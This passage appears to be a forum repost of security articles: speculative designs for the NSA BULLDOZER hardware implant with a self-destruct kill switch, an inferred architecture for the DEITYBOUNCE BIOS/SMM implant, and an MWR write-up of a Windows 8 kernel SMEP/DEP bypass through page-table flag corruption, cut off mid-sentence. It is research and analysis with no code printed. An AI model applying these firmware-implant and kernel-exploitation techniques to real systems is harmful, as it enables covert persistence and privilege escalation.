from—corrosion in metal subjected to harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an electromigration illustration. As you can see, the copper ion (Cu+) moves in the opposite direction from the electrons. The copper ion is previously a part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration. Figure 13 Electromigration. Courtesy: Wikipedia There are many ways to induce electromigration on a semiconductor chip. However, I would focus only on one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip. Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function was suddenly destroyed, you would raise suspicion on the target. One of the way to create large voltage inside an electronic circuit is by using the so-called “charge pump”. A charge pump is a DC to DC converter that uses capacitors as energy storage elements to create either a higher or lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs. Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiplication of the input voltage. As you can see, we can create voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It’s made of discrete electronics parts. The output voltage is usually not an exact multiple of the input voltage due to losses in the “multiplier” circuit. I suspect that a charge pump design implemented inside a semiconductor chip provides better “voltage multiplication” function compared to discrete ones. At this point, we have all the things needed to create a kill switch. Your circuit design only needs to incorporate the charge pump into the design. You can use the control register in an FPGA to feed the logic on whether to activate the charge pump or not. You can devise certain byte patterns to turn on the charge pump to destroy your prized malicious logic parts in the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of the many. I present it here merely out of my “intuition” to solve the problem of creating a kill switch. The military surely has more tricks up their sleeve. BULLDOZER Implementation Recap We have gathered all the techniques needed to build a “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions in the beginning of this article. The recap is as follows: BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card. BULLDOZER implements a PCI expansion ROM because it’s the delivery mechanism to “inject” GINSU malware code into the x86/x64 host system. BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT. BULLDOZER was designed by using SDR FPGA prototyping tools before being fabricated as ASIC in the NSA’s semiconductor fab. The NSA could use either Altera, Xilinx or internally-developed FPGA prototyping tools. BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of PCI expansion ROM chip exposed through XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during the PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code though. It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or more is required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough. A possibility not covered in this article is the NSA licensed design for the non-stealthy PCI WLAN controller chip part of BULLDOZER from commercial vendors such as Broadcom or Ralink. This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is BULLDOZER PCI chip being a multifunctioning PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here though. As for the chip marking for the BULLDOZER PCI WLAN controller chip, it could easily carried out by the NSA fab. Well, with the right tool, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “Bunnie” Huang blog: Qué romántico! « bunnie's blog. That is all for our BULLDOZER implementation recap. It’s quite a long journey, but we now have a clearer picture on BULLDOZER hardware implementation. Closing Thoughts: BULLDOZER Evolution Given that BULLDOZER was fielded almost six years ago, the present day BULLDOZER cranking out of the NSA’s fab must have evolved. Perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article into PCI Express (PCIe) though. Therefore, the NSA shouldn’t have any difficulty to carry out the protocol conversion. PCIe is compatible to PCI in the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of BULLDOZER design explained here. We should look into the “evolved” BULLDOZER in the future. By Darmawan Salihun|February 14th, 2014 Sursa: NSA Backdoor Part 2, BULLDOZER: And, Learn How to DIY a NSA Hardware Implant - InfoSec Institute
-
NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE This article is the first part of a series on NSA BIOS backdoor internals. Before we begin, I’d like to point out why these malwares are classified as “god mode.” First, most of the malware uses an internal (NSA) codename in the realms of “gods,” such as DEITYBOUNCE, GODSURGE, etc. Second, these malwares have capabilities similar to “god mode” cheats in video games, which make the player using it close to being invincible. This is the case with this type of malware because it is very hard to detect and remove, even with the most sophisticated anti-malware tools, during its possible deployment timeframe. This part of the series focuses on the DEITYBOUNCE malware described in the NSA ANT Server document, leaked by Edward Snowden. The analysis presented in this article is based on technical implications of the information provided by the document. The document lacks many technical specifics, but based on the BIOS technology at the day DEITYBOUNCE started to become operational, we can infer some technically sound hypotheses—or conclusions, if you prefer . Introduction to DEITYBOUNCE Malware DEITYBOUNCE operates as part of the system shown in Figure 1. Figure 1 shows several peculiar terms, such as ROC, SNEAKERNET, etc. Some of these terms are internally used by NSA. ROC is an abbreviation for remote operation center. ROC acts as NSA’s point of control of the target system; it’s located outside NSA’s headquarter. SNEAKERNET is a fabulous term for physical delivery of data, i.e., using humans to move data between computers by moving removable media such as magnetic tape, floppy disks, compact discs, USB flash drives (thumb drives, USB stick), or external hard drives from one computer to another. Figure 1 DEITYBOUNCE Extended Concept of Operation Figure 1 shows DEITYBOUNCE targeting the machines marked with red dot. DEITYBOUNCE itself is not installed on those machines because DEITYBOUNCE targets Dell PowerEdge 1850/2850/1950/2950 RAID server series with BIOS versions A02, A05, A06, 1.1.0, 1.2.0, or 1.3.7, not laptops or desktop/workstations. This means DEITYBOUNCE is installed in servers accessed by the laptops or desktop/workstations marked with red dots. The red dot also means that the target systems could act as “jump hosts” to implant DEITYBOUNCE in the target servers. Figure 1 also shows the presence of ARKSTREAM. ARKSTREAM is basically a malware dropper which contains BIOS flasher and malware dropper functions. ARKSTREAM can install DEITYBOUNCE on the target server either via exploits controlled remotely (network infection) or via USB thumb drive infection. This infection method, in a way, is very similar to the STUXNET malware dropper. ARKSTREAM installs DEITYBOUNCE via BIOS flashing, i.e., replacing the PowerEdge server BIOS with the one that is “infected” by DEITYBOUNCE malware. The NSA ANT server document doesn’t divulge minute details explaining DEITYBOUNCE’s “technical context” of operation. However, we can infer some parts of the “technical context” from the DEITYBOUNCE technical requirements mentioned in the document. These are the important technical details revealed by the NSA ANT server document: DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing system management mode (SMM) to gain periodic executions while the operating system (OS) loads. DEITYBOUNCE supports multiprocessor systems with RAID hardware and Microsoft Windows 2000, XP, and 2003 Server. Once implanted, DEITYBOUNCE’s frequency of execution (dropping the payload) is configurable and will occur when the target machine powers on. In later sections, we will look into DEITYBOUNCE malware architecture in more detail, based on these technical details. These details provide a lot more valuable hints than you think . But before that, you need to have some important background knowledge. A Closer Look at Dell Power-Edge Hardware Let’s start with the first item of background knowledge. In the previous section, we learned that DEITYBOUNCE targets Dell PowerEdge 1850/2850/1950/2950 RAID server series. Therefore, we need to look into the servers more closely to understand the DEITYBOUNCE execution environment. One can download the relevant server specifications from these links: Dell PowerEdge 1950 specification: http://www.dell.com/downloads/global/products/pedge/en/1950_specs.pdf Dell PowerEdge 2950 specification: http://www.dell.com/downloads/global/products/pedge/en/2950_specs.pdf The server specifications are rather ordinary. However, if you look more closely at the storage options of both server types, you’ll notice the option to use a RAID controller in both server types. The RAID controller is of the type PERC 5/i, PERC4e/DC, or PERC 5/e. We focus on the RAID controller hardware because DEITYBOUNCE technical details mentioned the presence of RAID as one of its hardware “requirements.” Now let’s move into more detailed analysis. You can download the user guide for the Dell PERC family of RAID controller from: ftp://ftp.dell.com/Manuals/Common/dell-perc-4-dc_User’s%20Guide_en-us.pdf. Despite the fact that the document is only a user guide, it provides important information, as follows: PERC stands for PowerEdge Expandable RAID Controller. This means the PERC series of RAID controller are either white-labeled by Dell or developed internally by Dell. There are several types of PERC RAID controllers. The ones with the XX/i moniker are the integrated versions, the XX/SC moniker means that the RAID controller is single channel, the XX/DC moniker means that the RAID controller is dual channel, and the XXe/XX moniker signifies that the RAID controller uses PCI Express (PCIe) instead of PCI bus. If the last moniker is missing, it implies that the RAID controller uses PCI, not PCIe. All PERC variants have 1MB of onboard flash ROM. Mind you, this is not the PowerEdge server motherboard flash ROM but the PERC RAID controller (exclusive) flash ROM. It’s used to initialize and configure the RAID controller. All PERC variants have NVRAM to store their configuration data. The NVRAM is located in the PERC adapter board, except when the PERC is integrated into the motherboard. The PERC RAID controller flash ROM size (1MB) is huge from the firmware code point of view. Therefore, anyone can insert an advanced—read: large in code size—malicious firmware-level module into it. I can’t find information on the Dell PowerEdge 1850/2850/1950/2950 BIOS chip size. However, the size of their compressed BIOS files is larger than 570KB. Therefore, it’s safe to assume that the motherboards BIOS chip size are at least 1MB because, AFAIK, there is no flash ROM chip—used to store BIOS code—that has a size between 570KB and 1MB. The closest flash ROM size to 570KB is 1MB. This fact also present a huge opportunity to place BIOS malware into the motherboard BIOS besides the RAID controller expansion ROM. Initial Program Loader (IPL) Device Primer The second item of background knowledge you need to know pertains to the IPL device. A RAID controller or other storage controller is an attractive victim for firmware malware because they are IPL devices, as per BIOS boot specification. The BIOS boot specification and PCI specification dictate that IPL device firmware must be executed at boot if the IPL device is in use. IPL device firmware is mostly implemented as PCI expansion ROM. Therefore, IPL device firmware is always executed, assuming the IPL device is in use. This fact opens a path for firmware-level malware to reside in the IPL device firmware, particularly if the malware has to be executed at every boot or on certain trigger at boot. For more details on IPL device firmware execution, see: https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2. You need to take a closer look at the boot connection vector (BCV) in the PCI expansion ROM in that article. The system BIOS calls/jumps-into the BCV during bootstrap to start the bootloader, which then loads and executes the OS. BCV is implemented in the PCI expansion ROM of the storage controller device. Therefore, the PERC RAID controller in Dell PowerEdge servers should implement BCV as well to conform to the BIOS boot specification. IPL device PCI expansion ROM also has a peculiarity. In some BIOS implementations, it’s always executed, whether or not the IPL device is being used. The reason is that the BIOS code very probably only checks for the PCI device subclass code and interface code in its PCI configuration register. See the “PCI PnP Expansion ROM Peculiarity” section at https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2#pci_pnp_rom_peculiarity. System Management Mode (SMM) Primer The third item of background knowledge needed to understand DEITYBOUNCE is SMM. A seminal work on SMM malware can be found in the Phrack ezine article, A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers at .:: Phrack Magazine ::.. SMI, in this context, means system management interrupt. The Phrack article contains knowledge required to understand how an SMM rootkit might work. There is one thing that needs to be updated in that Phrack article, though. Recent and present-day CPUs don’t use high segment (HSEG) anymore to store SMM code. Only top-of-memory segment (TSEG) is used for that purpose. If you’re not familiar with HSEG and TSEG, you can refer to System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute and System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute for details on HSEG and TSEG location in the CPU memory space. This means, for maximum forward compatibility, DEITYBOUNCE very possibly only uses TSEG in its SMM component. Entering SMM via software SMI in x86/x64 is quite simple. All you need to do is write a certain value to a particular I/O port address. A write transaction to this I/O port is interpreted by the chipset as a request to enter SMM, therefore the chipset sends an SMI signal to the CPU to enter SMM. There are certain x86/x64 CPUs that directly “trap” this kind of I/O write transaction and interpret it directly as a request to enter SMM without passing anything to the chipset first. The complete algorithm to enter SMM is as follows: Initialize the DX register with the SMM “activation” port. Usually, the SMM “activation” port is port number 0xB2. However, it could be a different port, depending on the specific CPU and chipset combination. You have to resort to their datasheets for the details. Initialize the AX register with the SMI command value. Enter SMM by writing the AX value to the output port contained in the DX register. As for the methods to pass parameters to the SMI handler routine, it’s not covered extensively by the Phrack article. Therefore, we will have a look the methods here. Some SMM code (SMI handler) needs to communicate with other BIOS modules or with software running inside the OS. The communication mechanism is carried out through parameter passing between the SMM code and code running outside SMM. Parameter(s) passing between the BIOS module and SMI handler in general are carried out using one of these mechanisms: Via the global non-volatile storage (GNVS). GNVS is part of ACPI v4.0 Specification and named ACPI non-volatile storage (NVS) in the ACPI specification. However, in some patent descriptions, NVS stands for non-volatile sleeping memory because the memory region occupied by NVS in RAM stores data that’s preserved even if the system is in sleep mode. Either term refers to the same region in RAM. Therefore, the discrepancies in naming can be ignored. GNVS or ACPI NVS is part of RAM managed by the ACPI subsystem in the BIOS. It stores various data. GNVS is not managed by the OS, but is reachable by the OS through the ACPI source language (ASL) interface. In Windows, parts of this region are accessible through the Windows management instrumentation (WMI) interface. Via general-purpose registers (GPRs) in x86/x64 architecture, i.e., RAX/EAX, RBX/EBX, RDX/EDX, etc. In this technique, a physical address pointer is passed via GPR to the SMI handler code. Because the system state, including the register values, is saved to the “SMM save state,” the code in the SMM area (the SMI handlers) is able to read the pointer value. The catch is: both the SMI handler and the code that passes the parameter(s) must agree on the “calling convention”, i.e., which register(s) to use. Knowing parameter passing between BIOS module and SMI handler is important because DEITYBOUNCE uses this mechanism extensively when it runs. We will look into it in more detail in later sections. Precursor to DEITYBOUNCE Malware Architecture As with other software, we can infer DEITYBOUNCE malware architecture from its execution environment. The NSA ANT server document mentions three technical hints, as you can see in the Introduction section. We’ll delve into them one by one to uncover the possible DEITYBOUNCE architecture. The need for RAID hardware means that DEITYBOUNCE contains a malware implanted in the RAID controller PCI expansion ROM. The RAID controller used in Dell PowerEdge 1950 server is the PERC 5/i, or PERC4e/DC, or PERC 5/e adapter card. All of these RAID controllers are either PCI or PCI Express (PCIe) RAID controllers. You have to pay attention to the fact that PCI expansion ROM also includes PCIe expansion ROM, because both are virtually the same. I have covered PCI expansion ROM malware basics in another article. See Malicious Code Execution in PCI Expansion ROM - InfoSec Institute for the details. The presence of a payload being dropped by DEITYBOUNCE means DEITYBOUNCE is basically a “second-stage” malware dropper—the first stage is the ARKSTREAM malware dropper. DEITYBOUNCE probably only provides these two core functions: The first is as a persistent and stealthy malware modules dropper. The second is to provide a “stealth” control function to other OS-specific malware modules. The malware modules could be running during OS initialization or from inside a running OS or the malware modules can operate in both scenarios. The OS-specific malware communicates with DEITYBOUNCE via SMM calls. The DEITYBOUNCE core functions above imply that there are possibly three kinds of malware components required for DEITYBOUNCE to work as follows: A persistent “infected” PCI expansion ROM. This module contains a routine to configure DEITYBOUNCE’s frequency of execution. The routine possibly stores the configuration in the RAID controller NVRAM. This module also contains the tainted interrupt 13h (Int 13h) handler that can call other routines via SMI to patch the kernel of the currently loading OS. SMI handler(s) code implanted in the PowerEdge motherboard BIOS to serve the software (SW) SMI calls from the “infected” RAID controller PCI expansion ROM. An OS-specific malware payload running in Windows 2000, Windows Server 2003, or Windows XP. At this point we already know the DEITYBOUNCE malware components. This doesn’t imply that we would be able to know the exact architecture of the malware, because there are several possible pathways through which to implement the components. However, I present the most probable architecture here. This is an educated guess. There could be inaccuracies because I don’t have a sample DEITYBOUNCE binary to back up my assertions. But I think the guesses should be close enough, given the nature of x86/x64 firmware architecture. If you could provide a binary sample with suspected DEITYBOUNCE in it, I’m open to analyze it, though . DEITYBOUNCE Malware Architecture We need to make several assumptions before proceeding to the DEITYBOUNCE architecture. This should make it easier to pinpoint the technical details of DEITYBOUNCE. These are the assumptions: The BIOS used by the Dell PowerEdge targets is a legacy BIOS, not EFI/UEFI. This assumption is strengthened by the NSA ANT server document, which mentions the target OS as Windows 2000/XP/2003. None of these operating systems provides mature EFI/UEFI support. All user manuals, including the BIOS setup user manual, don’t indicate any menu related to UEFI/EFI support, such as booting in legacy BIOS mode. Therefore, it’s safe to assume that the BIOS is a legacy BIOS implementation. Moreover, during the launch time of DEITYBOUNCE, EFI/UEFI support in the market is still immature. The custom SMI handler routines required to patch the OS kernel during bootstrap are larger than the empty space available in the motherboard BIOS. Therefore, the routines must be placed into two separate flash ROM storage, i.e., the PERC RAID controller flash ROM chip and the Dell PowerEdge motherboard flash ROM chip. This may be not the case, but let’s just make an assumption here, because even a rudimentary NTFS driver would require at least several tens of kilobytes of space when compressed, not to mention a complicated malware designed to patch kernels of three different operating systems. The assumptions above have several consequences for our alleged DEITYBOUNCE architecture. The first one is that there are two stages in DEITYBOUNCE execution. The second one is that the malware code that patches the target OS kernel during bootstrap (interrupt 19h) is running in SMM. Now let’s look into the DEITYBOUNCE execution stages. DEITYBOUNCE execution stages are as follows: Stage 1—PCI expansion ROM initialization during power-on self-test (POST). In this stage, DEITYBOUNCE installs additional malicious SMI handlers in the system management RAM (SMRAM) range in the RAM on the motherboard. The assumption here is that the SMRAM range is not yet locked by the motherboard BIOS, therefore the SMRAM range is still writeable. SMRAM is a range in system memory (RAM) that is used specifically for SMM code and data. Contents of SMRAM are only accessible through SMI after it has been locked. On most Intel Northbridge chipsets or recent CPUs, SMRAM is controlled by the register that controls the TSEG memory region. Usually, the register is called TSEG_BASE in Intel chipset documentation. Stage 2—Interrupt 13h execution during bootstrap (interrupt 19h). Interrupt 13h handler in the PERC RAID controller PCI expansion ROM is “patched” with malicious code to serve interrupt 19h invocation (bootstrap). Interrupt 19h copies the bootloader to RAM by calling interrupt 13h function 02h, read sectors from drive, and jump into it. DEITYBOUNCE doesn’t compromise the bootloader. However, DEITYBOUNCE compromises the interrupt 13h handler. The “patched” interrupt 13h handler will modify the loaded OS kernel in RAM. Figure 2 shows stage 1 of DEITYBOUNCE execution and Figure 3 shows stage 2 of DEITYBOUNCE execution. Figure 2 DEITYBOUNCE Execution Stage 1 DEITYBOUNCE stage 1 execution, shown in Figure 2, happens during the PCI expansion ROM initialization stage at POST. If you’re not familiar with the detailed steps carried out by the BIOS to initialize an x86/x64 system, a.k.a. power-on self-test, please read my system address map initialization on x86/x64 Part 1 article at System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute. We know that PCI expansion ROM initialization is initiated by the motherboard BIOS from the Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute). The motherboard BIOS calls the INIT function (offset 03h from start of the PCI expansion ROM) with a far call to start add-on board initialization by the PCI expansion ROM. This event is the stage 1 of DEITYBOUNCE execution. In the DEITYBOUNCE case, the add-on board is the PERC PCI/PCIe board or the PERC chip integrated with the PowerEdge motherboard. Figure 2 illustrates the following execution steps: PERC RAID PCI expansion ROM executes from its INIT entry point. The infected ROM code reads DEITYBOUNCE configuration data from the RAID controller NVRAM. The infected ROM code copies DEITYBOUNCE’s additional SMI handlers to the SMRAM range in the motherboard main memory (system RAM). The infected ROM code fixes checksums of the contents of SMRAM as needed. Once the steps above are finished, the SMRAM contains all of DEITYBOUNCE’s SMI handlers. Figure 2 shows that the SMRAM contains “embedded” DEITYBOUNCE SMI handlers that are already present in SMRAM before the DEITYBOUNCE component in the RAID controller PCI expansion ROM is copied into SMRAM. The embedded DEITYBOUNCE component is injected into the motherboard BIOS. That’s why it’s already present in SMRAM early on. Figure 2 shows DEITYBOUNCE configuration data stored in the PERC add-on board NVRAM. This is an elegant and stealthy way of storing configuration data. How many anti-malware tools scan add-on board NVRAM? I’ve never heard of any. Figure 3 DEITYBOUNCE Execution Stage 2 Now, let’s move to stage 2 of DEITYBOUNCE execution. There are several steps in this execution stage, as follows: The mainboard BIOS executes the PERC RAID controller PCI expansion ROM routine at bootstrap via interrupt 19h (bootstrap). This time the entry point of the PCI expansion ROM is its BCV, not the INIT function. Interrupt 19h invokes interrupt 13h function 02h to read the first sector of the boot device—in this case the HDD controlled by the RAID controller—to RAM and then jump into it to start the bootloader. The infected PCI expansion ROM routine contains a custom interrupt 13h handler. This custom interrupt handler executes when interrupt 13h is called by the bootloader and part of the OS initialization code. The custom routines contain the original interrupt 13h handler logic. But the custom one adds routines to infect the kernel of the OS being loaded. Interrupt 13h provides services to read/write/query the storage device. Therefore, a malicious coder can modify the contents of interrupt 13h handler routine to tamper with the content being loaded to RAM. Figure 3 shows that the custom interrupt 13h handler contains a routine to call the DEITYBOUNCE SMI handler via software SMI. The DEITYBOUNCE SMI handler contains a routine to install malware or to activate certain vulnerabilities in the target OS kernel while the OS is still in the initialization phase. Execution of the custom interrupt 13h handler depends on DEITYBOUNCE configuration data. Figure 3 DEITYBOUNCE configuration data related to the custom interrupt 13h handler is stored in the PERC RAID controller NVRAM. The target OS contains a vulnerability or malware after steps 1 and 2 in DEITYBOUNCE second stage execution. Keep in mind that the vulnerability or malware only exists in RAM because the instance of the OS that’s modified by DEITYBOUNCE exists in RAM, not in a permanent storage device (HDD or SSD). At this point we know how DEITYBOUNCE might work in sufficient detail. However, you should be aware that this is only the result of my preliminary assessment on DEITYBOUNCE. Therefore, it’s bound to have inaccuracies. Closing Thoughts: Hypotheses on DEITYBOUNCE Technical Purpose There are two undeniable strategic values possessed by DEITYBOUNCE compared to “ordinary” malware: DEITYBOUNCE provides a stealthy way to alter the loaded OS without leaving a trace on the storage device, i.e., HDD or SSD, in order to avoid being detected via “ordinary” computer forensic procedures. Why? Because the OS is manipulated when it’s loaded to RAM, the OS installation on the storage device itself is left untouched (genuine). SMM code execution provides a way to conceal the code execution from possible OS integrity checks by other-party scanners. In this respect, we can view DEITYBOUNCE as a very sophisticated malware dropper. DEITYBOUNCE provides a way to preserve the presence of the malware in the target system because it is persistent against OS reinstallation. Given the capabilities provided by DEITYBOUNCE, there could possibly be a stealthy Windows rootkit that communicates with DEITYBOUNCE via software SMI to call the DEITYBOUNCE SMI handler routine at runtime from within Windows. The purpose of such a rootkit is unclear at this point. Whether the required SMI handler is implemented by DEITYBOUNCE is unknown at the moment. By Darmawan Salihun|January 29th, 2014 Sursa: NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute
-
Windows 8 Kernel Memory Protections Bypass Recently, MWR intern Jérémy Fetiveau (@__x86) conducted a research project into the kernel protections introduced in Microsoft Windows 8 and newer. This blog post details his findings, and presents a generic technique for exploiting kernel vulnerabilities, bypassing SMEP and DEP. Proof-of-concept code is provided which reliably gains SYSTEM privileges, and requires only a single vulnerability that provides an attacker with a write-what-where primitive. We demonstrate this issue by providing a custom kernel driver, which simulates the presence of such a kernel vulnerability. Introduction Before diving into the details of the bypass technique, we will quickly run through some of the technologies we will be breaking, and what they do. If you want to grab the code and follow along as we go, you can get the zip of the files here. SMEP SMEP (Supervisor Mode Execution Prevention) is a mitigation that aims to prevent the CPU from running code from user-mode while in kernel-mode. SMEP is implemented at the page level, and works by setting flags on a page table entry, marking it as either U (user) or S (supervisor). When accessing this page of memory, the MMU can check this flag to make sure the memory is suitable for use in the current CPU mode. DEP DEP (Data Execution Prevention) operates much the same as it does in user-mode, and is also implemented at the page level by setting flags on a page table entry. The basic principle of DEP is that no page of memory should be both writeable and executable, which aims to prevent the CPU executing instructions provided as data from the user. KASLR KASLR (Kernel Address Space Layout Randomization) is a mitigation that aims to prevent an attacker from successfully predicting the address of a given piece of memory. This is significant, as many exploitation techniques rely on an attacker being able to locate the addresses of important data such as shellcode, function pointers, etc. Paging 101 With the use of virtual memory, the CPU needs a way to translate virtual addresses to physical addresses. There are several paging structures involved in this process. Let’s first consider a toy example where we only have page tables in order to perform the translation. For each running process, the processor will use a different page table. Each entry of this page table will contain the information “virtual page X references physical frame Y”. Of course, these frames are unique, whereas pages are relative to their page table. Thus we can have a process A with a page table PA containing an entry “page 42 references frame 13” and a process B with a page table PB containing an entry “page 42 references frame 37”. If we consider a format for virtual addresses that consists of a page table field followed by an offset referencing a byte within this page, the same address 4210 would correspond to two different physical locations according to which process is currently running (and which page table is currently active). For a 64-bit x86_64 processor, the virtual address translation is roughly the same. However, in practice the processor is not only using page tables, but uses four different structures. In the previous example, we had physical frames referenced by PTEs (page table entries) within PTs (page tables). In the reality, the actual format for virtual addresses looks more like the illustration below: The cr3 register contains the physical address of the PML4. The PML4 field of a virtual address is used to select an entry within this PML4. The selected PML4 entry contains (with a few additional flags) the physical address of a PDPT (Page Directory Pointer Table). The PDPT field of a virtual address therefore references an entry within this PDPT. As expected this PDPT entry contains the physical address of the PD. Again, this entry contains the physical address of a PD. We can therefore use the PD field of the virtual address to reference an entry within the PD and so on and so forth. This is well summarized by Intel’s schema: It should be now be clearer how the hardware actually translates virtual addresses to physical addresses. An interested reader who is not familiar with the inner working of x64 paging can refer to the section 4.5 of the volume 3A of the Intel manuals for more in-depth explanations. Previous Exploitation Techniques In the past, kernel exploits commonly redirected execution to memory allocated in user-land. Due to the presence of SMEP, this is now no longer possible. Therefore, an attacker would have to inject code into the kernel memory, or convince the kernel to allocate memory with attacker-controlled content. This was commonly achieved by allocating executable kernel objects containing attacker controlled data. However, due to DEP, most objects are now non executable (for example, the “NonPagedPoolNx” pool type has replaced “NonPagedPool”). An attacker would now have to find a way to use a kernel payload which uses return-oriented programming (ROP), which re-uses existing executable kernel code. In order to construct such a payload, an attacker would need to know the location of certain “ROP gadgets”, which contain the instructions that will be executed. However, due to the presence of KASLR, these gadgets will be at different addresses on each run of the system, so locating these gadgets would likely require additional vulnerabilities. Technique Overview The presented technique consists of writing a function to deduce the address of paging structures from a given user-land memory address. Once these structures are located, we are able to partially corrupt them to change the metadata, allowing us to “trick” the kernel into thinking a chunk that was originally allocated in user-mode is suitable for use in kernel-mode. We can also corrupt the flags checked by DEP to make the contents of the memory executable. By doing this in a controlled manner, we can created a piece of memory that was initially allocated as not executable by a user-mode process, and modify the relevant paging structures so that it can be executed as kernel-mode code. We will describe this technique in more detail below. Retrieving the Addresses of Paging Structures When the kernel wants to access paging structures, it has to find their virtual addresses. The processor instructions only allow the manipulation of virtual addresses, not physical ones. Therefore, the kernel needs a way to map those paging structures into virtual memory. For that, several operating systems use a special self-referencing PML4 entry. Instead of referencing a PDPT, this PML4 entry will reference the PML4 itself, and shift the other values to make space for the new self-reference field. Thus, instead of referencing a specific byte of memory within a memory page, a PTE will be referenced instead. It is possible to retrieve more structures by using the same self-reference entry several times. A good description of this mechanism can also be found in the excellent book What makes it page? The Windows 7 (x64) virtual memory manager by Enrico Martignetti. A Step-By-Step Example To better understand this process, let’s go through an example showing how to build a function that maps a virtual address to the address of its PTE. First, we should remind ourselves of the usual format of a virtual address. A canonical address has its 48 bits composed of four 9-bit fields and one 12-bit offset field. The PML4 field references an entry within the PML4, the PDPT references an entry within the PDPT, and so on and so forth. If we want to reference a PTE instead of a byte located within a page, we can use the special PML4 entry 0y111101101. We fill the PML4 field with this special entry and then shift everything 9-bits to the right so that we get an address with the following format: We use this technique to build a function which maps the address of a byte of memory to the address of its PTE. If you are following along in the code, this is implemented in the function “getPTfromVA” in the file “computation.cpp”. It should be noted that, even though the last offset field is 12 bits, we still do a 9-bit shift and set the remaining bits to 0 so that we have an aligned address. To get the other structures, we can simply use the same technique several times. Here is an example for the PDE addresses: Modifying Paging Structures We use the term PXE as a generic term for paging structures, as many of them share the same structure, which is as follows: There are a number of fields that are interesting here, especially the NX bit field, which defines how the memory can be accessed, and the flags at the end, which include the U/S flag. This U/S flag denotes whether the memory is for use in user-mode or supervisor-mode (kernel-mode). When checking the rights of a page, the kernel will check every PXE involved in the address translation. That means that if we want to check if the U/S flag is set, we will check all entries relating to that page. If any of the entries do not have the supervisor flag set, any attempt to use this page from kernel mode will trigger a fault. If all of the entries have the supervisor flag set, the page will be considered a kernel-mode page. Because DEP is set at the page granularity level, typically higher level paging structures will be marked as executable, with DEP being applied at the PTE level by setting the NX bit. Because of this, rather than starting by allocating kernel memory, it is easier to allocate user memory with the executable rights using the standard API, and then corrupt the paging structures to modify the U/S flag and cause it to be interpreted as kernel memory. Using Isolated PXEs If we corrupt a random PXE, we are likely to be in a case where the target PXE is part of a series of PXEs that are contiguous in memory. In these cases, during exploitation it might mean that an attacker would corrupt adjacent PXEs, which has a high risk of causing a crash. Most of the time, the attacker can’t simply modify only 1 bit in memory, but has to corrupt several bytes (8 bytes in our POC), which will force the attacker to corrupt more than just the relevant flags for the exploit. The easiest way to circumvent this issue is simply to target a PXE which is isolated (e.g., with unused PXE structures on either side of the target PXE). In 64-bit environments, a process has access to a huge virtual address space of 256TB as we are effectively using a 48-bit canonical addresses instead of the full 64-bit address space. A 48-bit virtual address is composed of several fields allowing it to reference different paging structures. As the PML4 field is 9 bits, it refers to one of 512 (2**9) PML4 entries. Each PML4 entry describes a range of 512GB (2**39). Obviously, a user process will not use so much memory that it will use all of the PML4 entries. Therefore, we can request the allocation of memory at an address outside of any 512GB used range. This will force the use of a new PML4 entry, which will reference structures containing only a single PDPT entry, a single PDE and a single PTE. An interested reader can verify this idea using the “!address” and “!pte” windbg extensions to observe those “holes” in memory. In the presented POC, the 0×100804020001 address is used, as it is very likely to be in an unused area. Practical Attack The code for the mitigation bypass is very simple. Suppose that we’ve got a vulnerable kernel component for which we are able to exploit a vulnerability which gives us a write-what-where primitive from a user-land process (this is implemented within the “write_what_where” function in our POC). We choose a virtual address with isolated paging structures (such as 0×100804020001), allocate it and fill it with our shellcode. We then retrieve all of its paging structures using the mapping function described earlier in this post (using the field shifting and the self- referencing PML4). Finally, we perform unaligned overwrites of the 4 PXEs relating to our chosen virtual address to modify its U/S bit to supervisor. Of course, other slightly different scenarios for exploitation could be considered. For instance, if we can decrement or increment an arbitrary value in memory, we could just flip the desired flags. Also, since we are using isolated paging structures, even in the case of a bug leading to the corruption of a 